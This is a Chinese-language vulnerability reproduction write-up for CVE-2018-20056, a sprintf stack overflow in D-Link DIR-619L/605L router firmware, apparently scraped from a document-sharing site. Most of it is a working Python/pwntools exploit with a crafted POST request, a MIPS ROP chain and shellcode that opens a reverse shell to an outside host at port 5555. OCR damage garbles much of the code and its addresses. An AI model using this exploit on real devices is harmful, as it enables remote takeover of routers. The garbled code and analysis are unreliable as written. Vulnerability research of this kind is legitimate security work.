《(CVE-2018-20056)D-Link DIR-619L&605L 栈溢出漏洞.docx》由会员分享,可在线阅读,更多相关《(CVE-2018-20056)D-Link DIR-619L&605L 栈溢出漏洞.docx(4页珍藏版)》请在第一文库网上搜索。
1、(CVE-2018-20056)D-1inkDIR-6191&6051栈溢出漏洞一、漏洞简介D-1INK的D1R-6191Rev.B2.06B1版本之前和DIR-6051Rev.B2.12B1版本之前的设备,在binboa文件的form1anguage函数中存在缓冲区溢出漏洞,在调用sprintf函数时没有对参数的长度进行检查,导致远程攻击者可以通过访问http:/ipZgoformZform1anguageChange并指定CurrTime参数实现远程代码执行。固件下载地址:ftp:/二、漏洞影响D-1INK的DIR-6191Rev.B2.06B1版本之前和DIR-6051Rev.B2.12
2、B1版本之前的设备。三、复现过程漏洞分析在form1anguageChange函数中,通过WebsGetVar获取config.i18n.1anguage,nextPage,CUrrTime等参数。WebSGetVar通过ma11oc、memcpy将获取到的参数返回给form1anguageChange。form1anguageChange接下来调用了SPrintf危险函数向IOCa1f8变量中读入参数内容,并在下一步WebsRedirect使用了1oca1J8作为参数。voidform1anguageChange(undefined4uParm1)(intiVar1;char*pcVar2;
3、undefined4UVar3;FI1E*_stream;char*_si;char1oca1_f8200;characStack4824;undefined41oca1_18;int1oca1_14;_si=(char*)websGetVar(uParm1config.i18n-1anguagejSDAT_004ac874)apmib_set(0x129,&1oca1_18);_si=(char*)websGetVar(uParm1,nextPage,jSDAT_004ac874);if(*_s1=0)Var3=WebSGetVar(UParmIJc1IrrTime”,&DAT_004ac8
4、74);获取currTime参数e1sesi=/index.asp;sprintf(Ioca1-f8j%sPt=%s,_s1,uVar3);危险函数sprintf直接读入字符1AB_00460b34:WebsRedirect(uParm1,1oca1_f8);return;)WebSRedireCt主要调用send_r_moved_perm,这个函数调用了两次危险函数sprintf,分另IJ向acStack224(sp+0x19f8-0xe0)f11acStack480(sp+0x19f8-0x1e0)输入字符。undefined4websRedirect(intiParm1,char*pcP
5、arm2)(char*pcVar1;*(undefined4*)(iParm1+0x50)=0;pcVar1=strstr(pcParm2japp1y-setting.asp);if(pcVar1!=(char*)0x0)app1y_setting_redirect=app1y_setting_redirect+1;)send_r_moved_perm(iParm1,pcParm2);return0;voidsend_r_moved_perm(intiParm1char*pcParm2)(undefined4uVar1;char*pcVar2;undefinedauStack66246144;
6、characStack480256;characStack224200;if(pcVar2=(char*)0x0)if(*pcParm2=/)pcParm2=pcParm2+1;sprintf(acStack224,http:/%s%s?*(undefined4*)(iParm1+0x70)jpcParm2);pcParm2=acStack224;sprintf(acStack4804rnttThisdocumenthasmovedtoanew1ocation.rnttP1easeupdateyourdocumentstoref1ectthenew1ocation.rnttrn”jpcParm
7、2);.sreturn;)通过第二两个SPrintf修改返回地址,构造ROP链,导致程序控制流被劫持。(也可以通过两个sprintf的配合来实现栈的迁移,漏洞作者是这么实现的)漏洞复现pocimportrequestsimportsysimportstructfrompwnimport*#context.1og-1eve1=,debug,context.arch=mipscontext.endian=,bigip=192.168.75.150,defsyscmd1(a):p=remote(ipj80)z=1en(a)print,+1en:+str(z)pay1oad=pay1oad+=POST
8、goformfOrm1anguageChangeHTTP1.1rnpay1oad+=Host:,+ip+rn,pay1oad+=,Connection:keep-a1ivern,pay1oad+=Accept-Encoding:gzipjdef1atern,pay1oad+=Accept:*rn,pay1oad+=User-Agent:python-requests/2.18.4rnpay1oad+=Content-1ength:+str(z+9)+,rnpay1oad+=Content-Type:app1icationx-www-form-ur1encodedrnpay1oad+=,rn,p
9、ay1oad+=,currTime=,pay1oad+=a+,rn,p.send(pay1oad)p.recvunti1()#raw_input()p.c1ose()#baseaddressofIibc.so.0base1=02ab88000#she11codeSc=Struct.pack(I,j0x24060101)sc+=struct.pack(I,0x04d0ffff)sc+=struct.pack(,I,0x2806ffff)sc+=struct.pack(I,0x27bdffe)sc+=struct.pack(,1,0x27e41001)sc+=struct.pack(I,0x248
10、4f023)sc+=struct.pack(I,0afa4ffe8)sc+=struct.pack(1,0afa0ffec)sc+=struct.pack(I,027a5ffe8)sc+=struct.pack(I,0x24020fab)sc+=struct.pack(1,0xafa00108)sc+=struct.pack(,1j0x0101010c)sc+=,7binsh00she11code=,she11code+=asm(she11craft.connect(192.168.75.149,5555)she11code+=asm(she11craft.dup2(5j0)she11code
11、+=asm(She11craft.dup2(5j1)she11code+=scs0=struct.pack(Ibase1+0x2C794)S1=Struct.pack(Ijbase1+0x2C794)#rop2:move$t9,$s2;jr$t9s2=struct.pack(Ijbase1+0x24b70)#rop3:s1eep(1)s3=struct.pack(Ijbase1+0x2bdac)#rop5:addiu$a0,$sp,0x18;.;IW$ra,030;jr$ras4=struct.pack(I,base1+0x2bdac)#roppay1oad1=a,*0x167+s0+s1+s
12、2+s3pay1oad1+=struct.pack(,I,base1+025714)#rop1:Ii$a0,1;move$t9,$s1;ja1r$t9;ori$a1,js0,2pay1oad1+b*01c+s0+s1+s2+s3+s4pay1oad1+=struct.pack(1,base1+05f98)#rop4:Iw$ra,0x1c($sp);.;jr$rapay1oad1+=c,*0x1cpay1oad1+=s3pay1oad1+=,d,*0x18pay1oad1+=struct.pack(,1,0x24910101)#rop7addiu$s1,$a0,257;addi-257;move
13、$t9,Ss1jja1r$t9pay1oad1+=struct.pack(I,02231feff)pay1oad1+=struct.pack(I,00220c821)pay1oad1+=struct.pack(1,0x0320f809)pay1oad1+=struct.pack(I,02231feff)pay1oad1+=struct.pack(I,0x2231feff)pay1oad1+=struct.pack(,1,base1+02bda)#rop6:mov$t9,$a0;.;ja1r$t9pay1oad1+=e*020+she11codeif_name_=_main_,:syscmd1(pay1oad1)利用效果:2018-2MS6SpythonDIR-6191.pyOpeningconnectionto192.168.7S.150onport86:Done1en:7441C1OSedCOnneCttonto,92.168.7S.15。DOrt8。
免费区 
